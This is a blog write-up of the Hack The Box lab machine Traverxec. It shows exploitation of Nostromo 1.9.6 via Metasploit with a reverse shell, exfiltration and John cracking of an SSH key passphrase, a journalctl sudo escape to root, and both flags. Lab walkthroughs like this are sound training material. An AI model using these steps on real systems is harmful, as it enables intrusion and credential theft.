Hack The Box Writeup: Traverxec

On November 16 last year, Hack The Box launched the Linux Machine Traverxec. A box with a difficulty level of “Easy”, something that indeed matches after rooting.

Hack The Box Traverxec

[0x1] Reconnaissance & Enumeration

Starting the new box starts of course again with an Nmap scan of all ports based on script and service detection.

nmap -sC -sV -p- -oA traverxec 10.10.10.165

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-06 20:03 GMT
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.05% done; ETC: 20:10 (0:04:36 remaining)
Stats: 0:04:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.21% done; ETC: 20:11 (0:02:57 remaining)
Nmap scan report for 10.10.10.165
Host is up (0.020s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 393.13 seconds

The scan shows that port 80 is open and here a Nostromo 1.9.6. service is active. A quick check with searchsploit indicates that a known Directory Traversal RCE is known and available in Metasploit.

searchsploit nostromo

----------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                 | exploits/multiple/remote/47573.rb

[0x2] Initial foothold

Let’s fire up the good old msfconsole.

msfconsole
_____________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
      \ / /
       \ . / / x
        \ / /
         \ / + /
          \ + / /
           * / /
                                   / . /
    X / / X
                                 / ###
                                / # % #
                               / ###
                      . /
     . / . * .
                            /
                           *
                  + *
                                       ^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com
       =[ metasploit v5.0.72-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Before I got the Nostromo exploit available I had to update Metasploit. This can be done easily with apt install metasploit framework . If you already have Metasploit, the package will be updated immediately.

msf5 exploit(multi/http/nostromo_code_exec) > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

You really only need two options to activate the exploit. RHOSTS with the IP address of the Traverxec box and LHOST with your own tunnel IP address.

msf5 > use exploit/multi/http/nostromo_code_exec 

msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165

msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.15.47
LHOST => 10.10.15.47

The exploit takes a few seconds to run and after this you will get a limited shell like www-html.

msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.47:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.47:4444 -> 10.10.10.165:55468) at 2020-02-08 09:35:06 +0000

whoami
www-data

By means of the command shell you can upgrade the current shell to an interactive shell.

shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell

[0x3] Path to User flag

After some poking around the machine and Nostromo’s documentation, I found the config file where the options are stored. Ultimately, public_www turns out to be the place where interesting information can be found. However, you must go to the full path, not folder by folder due to a limitation in your permissions.

cat /var/nostromo/conf/nhttpd.conf

# MAIN [MANDATORY]
servername	traverxec.htb
serverlisten	*
serveradmin	david@traverxec.htb
serverroot	/var/nostromo
servermimes	conf/mimes
docroot	/var/nostromo/htdocs
docindex	index.html
# LOGS [OPTIONAL]
logpid	logs/nhttpd.pid
# SETUID [RECOMMENDED]
user	www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess	.htaccess
htpasswd	/var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons	/var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs	/home
homedirs_public	public_www

While watching a YouTube video about Hack The Box, I came across the following way to easily copy / paste a file to your own machine from a remote session. By means of base64 encode the file itself and you can copy the text. In this case I do that with the gunzipped tarball.

base64 backup-ssh-identity-files.tgz

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

I paste the base64 data in the file backup_base64.txt and then I decode the contents as a new file backup.tgz .

base64 -d backup_base64.txt |sudo tee backup.tgz

Extracting the original files in the archive can now be done in the usual way and after this the private and public key of David will appear.

tar -zxf backup.tgz
ls
authorized_keys id_rsa id_rsa.pub

I prepare the captured Private Key to crack with John The Ripper. For this I use ssh2john, a Python script which is standard present in / usr / share / john.

python /usr/share/john/ssh2john.py id_rsa > id_rsa_ready4john.txt

With the Private Key suitable for John I start the dictionary attack based on the Rockyou wordlist.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_ready4john.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2020-02-08 10:57) 0.1779g/s 2551Kp/s 2551Kc/s 2551KC/sa6_123..*7¡Vamos!
Session completed

John doesn’t have much trouble finding the password and within seconds the attack on the Private Key was successfully completed: hunter it is!

john id_rsa_ready4john.txt --show
id_rsa:hunter

Based on the Private Key, I connect via SSH, which came out of the Nmap scan as an option, and enter the password. After this, a prompt like David appears neatly .

ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': 

Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Sat Feb 8 05:59:17 2020 from 10.10.15.230
david@traverxec:~$ 

A quick check in the current directory will indicate the presence of the user.txt .

ls
bin public_www user.txt

So much for the user flag. But now time for the other half of the challenge. On to root!

cat user.txt
7db0b48469606a42cec20750d9782f3d

[0x4] Path to Root flag

Once in David’s home folder it is time to look around for new clues. The bin folder contains an interesting script that gets some log data and displays it on the screen.

cat server-stats.sh

#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

journalctl is a so-called GTFObin, a Linux binary known to be exploited for privledge escalation. One of my first actions when seeing scripts running a command under sudo is to consult GTFObins.com .

When starting journalctl , the latest log entries from the journal daemon are displayed. However, it is possible to break out of this as shown in the above screenshot of GTFObins.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sat 2020-02-08 06:14
Feb 08 06:28:03 traverxec su[1297]: F
Feb 08 06:29:06 traverxec sudo[1370]:
Feb 08 06:29:20 traverxec sudo[1381]:
Feb 08 06:56:33 traverxec su[2396]: p
Feb 08 06:56:35 traverxec su[2396]: F

The command is active and gives output, now it is possible to escalate and get a shell as root using! / Bin / sh.

!/bin/sh

# whoami
root

Once a root user, I look for the root.txt in the well-known place to see if the key is there, or if a new challenge presents itself.

cd /root 
# ls
nostromo_1.9.6-1.deb root.txt

Root-flag it is! Nice box and relatively easy to do for beginners. Learned another nice privilege escalation and on to the next machine!

# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.